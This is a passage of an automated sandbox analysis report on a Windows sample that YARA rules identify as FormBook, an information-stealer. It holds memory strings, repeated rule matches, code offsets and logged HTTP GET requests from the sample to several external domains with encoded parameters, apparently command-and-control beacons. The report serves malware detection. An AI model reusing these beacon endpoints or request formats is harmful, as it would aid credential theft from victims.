70 61 6e 79 20 70 6f 6c 69 63 79 2e 20 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 72 20 73 79 73 74 65 6d 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 69 66 20 79 6f 75 20 62 65 6c 69 65 76 65 20 74 68 69 73 20 69 73 20 69 6e 20 65 72 72 6f 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 3c 62 3e 46 69 6c 65 20 6e 61 6d 65 3a 3c 2f 62 3e 20 20 3c 2f 70 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Virus/Spyware Download Bloc
          Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: divpCHa0h7.exe, 00000001.00000002.267439269.0000000002AB1000.00000004.00000001.sdmpString found in binary or memory: http://www.collada.org/2005/11/COLLADASchema9Done
          Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: divpCHa0h7.exe, 00000001.00000003.266066263.00000000059E0000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comasno
          Source: divpCHa0h7.exe, 00000001.00000003.246781947.00000000059FB000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: divpCHa0h7.exe, 00000001.00000003.246654381.00000000059FB000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.comX
          Source: divpCHa0h7.exe, 00000001.00000003.246591944.00000000059FB000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.comn
          Source: divpCHa0h7.exe, 00000001.00000003.248765539.0000000005A1D000.00000004.00000001.sdmp, divpCHa0h7.exe, 00000001.00000003.249127036.00000000059E4000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: divpCHa0h7.exe, 00000001.00000003.249127036.00000000059E4000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/c
          Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: divpCHa0h7.exe, 00000001.00000003.248765539.0000000005A1D000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn_
          Source: divpCHa0h7.exe, 00000001.00000003.248765539.0000000005A1D000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cna-d
          Source: divpCHa0h7.exe, 00000001.00000003.248804655.00000000059E4000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnl
          Source: divpCHa0h7.exe, 00000001.00000003.248765539.0000000005A1D000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnr-f
          Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: divpCHa0h7.exe, 00000001.00000003.250361250.00000000059E4000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: divpCHa0h7.exe, 00000001.00000003.250361250.00000000059E4000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/.
          Source: divpCHa0h7.exe, 00000001.00000003.250361250.00000000059E4000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/CursJ
          Source: divpCHa0h7.exe, 00000001.00000003.250361250.00000000059E4000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Gras
          Source: divpCHa0h7.exe, 00000001.00000003.250361250.00000000059E4000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y0
          Source: divpCHa0h7.exe, 00000001.00000003.250361250.00000000059E4000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y0zS
          Source: divpCHa0h7.exe, 00000001.00000003.250361250.00000000059E4000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/a-e7
          Source: divpCHa0h7.exe, 00000001.00000003.250361250.00000000059E4000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
          Source: divpCHa0h7.exe, 00000001.00000003.250361250.00000000059E4000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/o
          Source: divpCHa0h7.exe, 00000001.00000003.250361250.00000000059E4000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/ri
          Source: divpCHa0h7.exe, 00000001.00000003.250361250.00000000059E4000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/t
          Source: divpCHa0h7.exe, 00000001.00000003.246488006.00000000059FB000.00000004.00000001.sdmp, divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: divpCHa0h7.exe, 00000001.00000003.246488006.00000000059FB000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.coma-d
          Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: divpCHa0h7.exe, 00000001.00000003.247974313.00000000059E6000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: unknownDNS traffic detected: queries for: www.ribbonofficial.com
          Source: global trafficHTTP traffic detected: GET /fqiq/?z0DH=f0Dtar1PYnAdDzS&ZvEd=MhZqZeIh1bEx9EPhBOs++VNt6zdxCxYLlsX+VD+R30361cyojbkVOC5VQe1OoxOfJLYr HTTP/1.1Host: www.ribbonofficial.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /fqiq/?ZvEd=prTEVkQtidVRbelnknUsCYHPcHrUQSHWronmvObfBYwGPcpLSCQwPhh2tosJT24FW2ZT&z0DH=f0Dtar1PYnAdDzS HTTP/1.1Host: www.sanlifalan.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /fqiq/?z0DH=f0Dtar1PYnAdDzS&ZvEd=cd5R1bQkGt60ucaw3I3E0k/wUnqrUWXrQueIKe7m3jIZGD6slZfTAntz2qvR4Gb0BO+l HTTP/1.1Host: www.floaterslaser.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /fqiq/?ZvEd=oM7C4s4K9Ux9NUwG97tedYlymorHgm5Kv3Umj1Gnv/i5ubiDMWU/+XDfdu3U3Pyuil7R&z0DH=f0Dtar1PYnAdDzS HTTP/1.1Host: www.mambacustomboats.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /fqiq/?ZvEd=KZhYdxsAX/C25xiOpksKfhNe7DL7yKRLCy2J/73TfqSfqYhWOiYMofna8My9QnEOoaqj&z0DH=f0Dtar1PYnAdDzS HTTP/1.1Host: www.esyscoloradosprings.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 5.2.divpCHa0h7.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.divpCHa0h7.exe.3c268a0.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.divpCHa0h7.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.divpCHa0h7.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.divpCHa0h7.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.divpCHa0h7.exe.3bdc680.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.361762124.00000000005D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.290893406.0000000006D39000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.307316377.0000000006D39000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000001.265367323.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.361396861.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.519918692.0000000002660000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.361951579.00000000009D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.517884800.0000000000610000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.267848070.0000000003AB9000.00000004.00000001.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 5.2.divpCHa0h7.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.divpCHa0h7.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.divpCHa0h7.exe.3c268a0.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.divpCHa0h7.exe.3c268a0.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.1.divpCHa0h7.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.1.divpCHa0h7.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.1.divpCHa0h7.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.1.divpCHa0h7.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.divpCHa0h7.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.divpCHa0h7.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.divpCHa0h7.exe.3bdc680.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.divpCHa0h7.exe.3bdc680.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.361762124.00000000005D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.361762124.00000000005D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.290893406.0000000006D39000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.290893406.0000000006D39000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.307316377.0000000006D39000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.307316377.0000000006D39000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000001.265367323.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000001.265367323.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.361396861.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.361396861.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.519918692.0000000002660000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.519918692.0000000002660000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.361951579.00000000009D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.361951579.00000000009D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.517884800.0000000000610000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.517884800.0000000000610000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.267848070.0000000003AB9000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.267848070.0000000003AB9000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: divpCHa0h7.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 5.2.divpCHa0h7.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.divpCHa0h7.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.divpCHa0h7.exe.3c268a0.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.divpCHa0h7.exe.3c268a0.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.1.divpCHa0h7.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.1.divpCHa0h7.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.1.divpCHa0h7.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.1.divpCHa0h7.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.divpCHa0h7.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.divpCHa0h7.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.divpCHa0h7.exe.3bdc680.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.divpCHa0h7.exe.3bdc680.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.361762124.00000000005D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.361762124.00000000005D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.290893406.0000000006D39000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.290893406.0000000006D39000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.307316377.0000000006D39000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.307316377.0000000006D39000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000001.265367323.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000001.265367323.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.361396861.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.361396861.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.519918692.0000000002660000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.519918692.0000000002660000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.361951579.00000000009D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.361951579.00000000009D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.517884800.0000000000610000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.517884800.0000000000610000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.267848070.0000000003AB9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.267848070.0000000003AB9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 1_2_0106D064
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 1_2_0106F296
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 1_2_0106F298
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 1_2_04F90D51
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 1_2_04F95A10
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_0040102D
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00401030
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_0041B8D3
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_0041B8D6
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_0041C98B
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_0041C343
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00408C8B
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00408C90
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00402D8C
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00402D90
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00402FB0
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F2B090
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FD1002
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F34120
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F1F900
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F4EBB0
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F2841F
